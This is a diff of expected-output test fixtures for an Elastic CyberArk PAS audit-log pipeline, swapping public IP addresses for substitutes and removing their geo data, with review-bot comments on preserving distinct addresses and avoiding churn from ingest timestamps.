-<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway 
Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}}
-<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway 
Connection","GatewayStation":"34.71.250.247"}}}
+<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}}
+<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}}
+<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n 
Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.13\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.15"}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json
index 1f510b70d60..77fb6481866 100644
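Review bot: Two previously distinct external stations, 81.32.170.205 and 37.223.7.45 in the second and third records of this hunk, are both rewritten to 67.43.156.13, so this sample no longer exercises two different public source addresses even though the later records were given distinct substitutes (67.43.156.14 and 67.43.156.15). Keeping the substitution one-to-one, for example `"Station":"67.43.156.16"` in the record dated 2021-03-09T10:14:58Z, preserves the original variety of inputs at no cost and keeps the expected output for that event distinguishable from the one before it. The `raw` XML payloads were updated in step with the parsed `audit_record` values, which is correct since both carry the station and gateway addresses; a one-line comment near the top of the sample set noting that all public addresses are drawn from the documented test ranges would help the next person who has to regenerate these fixtures.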
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log-expected.json @@ -66,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025103300Z", + "ingested": "2021-12-09T13:36:39.546289100Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -97,23 +97,11 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "PVWAGWUser" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -137,7 +125,7 @@ "Administrator" ], "ip": [ - "81.32.170.205", + "67.43.156.13", "10.0.1.20" ] }, @@ -147,7 +135,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T08:32:51Z", "gateway_station": "10.0.1.20", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Full Gateway Connection", "source_user": "PVWAGWUser", "message": "Full Gateway Connection", 
@@ -161,8 +149,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025119800Z", - "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546293100Z", + "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", 
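Review bot: `event.ingested` is rewritten in this hunk (and every other hunk of the file) from `2021-06-09…` to `2021-12-09…` although the only intended change is the `Station` address inside `event.original`; pinning a wall-clock ingest time in the fixture means every regeneration touches every event and buries the real changes. If I recall the elastic-package pipeline-test options correctly, the test's `-config.yml` can declare the field dynamic, `dynamic_fields: event.ingested: ".*"`, after which its shape is still checked but its value no longer diffs. That would leave this hunk with only the `event.original` line that actually matters.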
@@ -192,23 +180,11 @@
 "ip": "10.0.1.20"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "37.223.7.45",
 "user": {
 "name": "PVWAGWUser"
 },
- "ip": "37.223.7.45"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -232,7 +208,7 @@
 "Administrator"
 ],
 "ip": [
- "37.223.7.45",
+ "67.43.156.13",
 "10.0.1.20"
 ]
 },
@@ -242,7 +218,7 @@
 "rfc5424": true,
 "iso_timestamp": "2021-03-09T10:14:58Z",
 "gateway_station": "10.0.1.20",
- "station": "37.223.7.45",
+ "station": "67.43.156.13",
 "action": "Full Gateway Connection",
 "source_user": "PVWAGWUser",
 "message": "Full Gateway Connection",
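Review bot: This event and the one in the preceding `@@ -97` hunk had distinct station addresses (37.223.7.45 here, 81.32.170.205 there) and both are now mapped to 67.43.156.13, so `source.ip`, `related.ip` and `cyberarkpas.audit.station` are identical across the two fixtures and they differ only by timestamp. The later hunks show the intent is a small fixed set of addresses (67.43.156.13, .14 and .15 all appear), so the per-event distinction could be kept by spreading the fixtures over that set rather than collapsing them onto one value. Concretely, `"station": "67.43.156.14"` here with the matching `"ip": "67.43.156.14"` in `source` and `related.ip` would preserve what the old values distinguished, assuming .14 is enriched the same way as .13.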
@@ -256,8 +232,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025124900Z", - "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"37.223.7.45\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546296400Z", + "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", 
@@ -338,7 +314,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025129Z", + "ingested": "2021-12-09T13:36:39.546301900Z", "original": "\u003c5\u003e1 2021-03-10T08:31:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:31:50\",\"IsoTimestamp\":\"2021-03-10T08:31:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", @@ -421,7 +397,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025132600Z", + "ingested": "2021-12-09T13:36:39.546306600Z", "original": "\u003c5\u003e1 2021-03-10T22:37:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:37:00\",\"IsoTimestamp\":\"2021-03-10T22:37:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.10\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", 
@@ -445,23 +421,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "user": { @@ -493,7 +457,7 @@ ], "ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -501,9 +465,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:05Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "127.0.0.1", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_VAGRANT", "message": "Full Gateway Connection", 
@@ -517,8 +481,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025136100Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 
Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:39.546311200Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -541,23 +505,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "user": { @@ -589,7 +541,7 @@ ], "ip": [ "10.0.2.2", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
